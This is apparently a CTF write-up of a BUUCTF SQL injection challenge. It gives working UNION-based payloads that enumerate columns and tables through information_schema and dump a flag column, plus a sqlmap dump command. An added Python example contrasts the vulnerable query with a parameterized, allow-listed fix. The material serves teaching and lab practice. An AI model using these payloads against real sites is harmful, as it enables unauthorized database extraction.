Fading Coder

SQL Injection CTF Challenge: Extracting Flag from Vulnerable Parameter

Challenge Overview

Source: BUUCTF Platform

Objective: Retrieve the flag value.

Approach

The challenge presents a web page with minimal visible content. The URL contains a query parameter ?id=1, which suggests the value is passed into a database query and is a likely SQL injection point.

Determining Injection Type

First, test whether the injection point accepts numeric payloads:

?id=1 and 1=2

If this were a numeric injection, the backend query would become:

SELECT * FROM users WHERE id=1 AND 1=2

This should break the page, because the condition 1=2 is never true, but the page remains unchanged. Therefore, this is not a numeric injection.

Identifying Closure Mechanism

Since it is not numeric, it must be character-based. Test single-quote closure:

?id=1' AND 1=2--+

If single-quote closure applies, the backend constructs the following (the + in the URL decodes to a space, which MySQL requires after --):

SELECT * FROM users WHERE id='1' AND 1=2 -- '

The page displays nothing, confirming single-quote closure.

Enumerating Columns

With closure identified, use ORDER BY to determine the number of columns:

?id=1' ORDER BY 3--+

Column count 3 returns normally. Testing count 4:

?id=1' ORDER BY 4--+

The page behavior changes, confirming exactly 3 columns exist.

Locating Display Columns

Use a UNION-based payload to identify which columns render output:

?id=-1' UNION SELECT 1,2,3--+

The results reveal which positions reflect data on the page.

Extracting Database Contents

Query available tables in the current database:

?id=-1' UNION SELECT 1,database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()--+

Two tables appear. One named fl4g looks promising for containing the flag.

Retrieving Flag Data

Query columns within the fl4g table:

?id=-1' UNION SELECT 1,database(),group_concat(column_name) FROM information_schema.columns WHERE table_name='fl4g'--+

A column named fllllag contains the target data.

Final Extraction

?id=-1' UNION SELECT 1,database(),group_concat(fllllag) FROM fl4g--+

The flag value displays on the page. Submit to verify.
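
Why the payloads above reach the fl4g table, and what stops them, shown as an added example (not code from the challenge or from the original write-up). Assumptions: an in-memory SQLite database stands in for the MySQL backend, database() is shimmed to return the schema name, and the users columns and the flag value are constructed placeholders.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    # Assumption: in-memory SQLite stands in for the challenge's MySQL backend.
    conn = sqlite3.connect(":memory:")
    # Shim so the write-up's database() call resolves; "note" is the schema
    # name used in the sqlmap command.
    conn.create_function("database", 0, lambda: "note")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'constructed-hash');
        CREATE TABLE fl4g (fllllag TEXT);
        INSERT INTO fl4g VALUES ('flag{constructed-placeholder}');
    """)
    return conn

def lookup_vulnerable(conn, raw_id):
    # Pattern inferred by the closure test: input pasted between single quotes.
    sql = "SELECT * FROM users WHERE id='" + unquote_plus(raw_id) + "'"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, raw_id):
    value = unquote_plus(raw_id)
    # Allow-list: the parameter is a numeric id, so reject everything else.
    if not re.fullmatch(r"[0-9]{1,10}", value):
        return []
    # Bound parameter: the value travels as data, never as SQL text.
    sql = "SELECT * FROM users WHERE id = ?"
    return conn.execute(sql, (int(value),)).fetchall()

if __name__ == "__main__":
    conn = make_db()
    probes = [  # taken verbatim from the write-up
        "1",
        "1' ORDER BY 4--+",
        "-1' UNION SELECT 1,database(),group_concat(fllllag) FROM fl4g--+",
    ]
    for raw in probes:
        try:
            leaked = lookup_vulnerable(conn, raw)
        except sqlite3.OperationalError as exc:
            leaked = f"SQL error: {exc}"
        print(f"{raw!r}\n  vulnerable: {leaked}\n  hardened:   {lookup_hardened(conn, raw)}")
```

The hardened lookup returns the same row for ?id=1 and an empty result for every probe, so the ORDER BY error and the UNION output that the walkthrough relies on never appear.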

Automated Alternative

sqlmap handles this automatically:

sqlmap -u "http://target-url/index.php?id=1" -D note -T fl4g -C fllllag --dump --batch
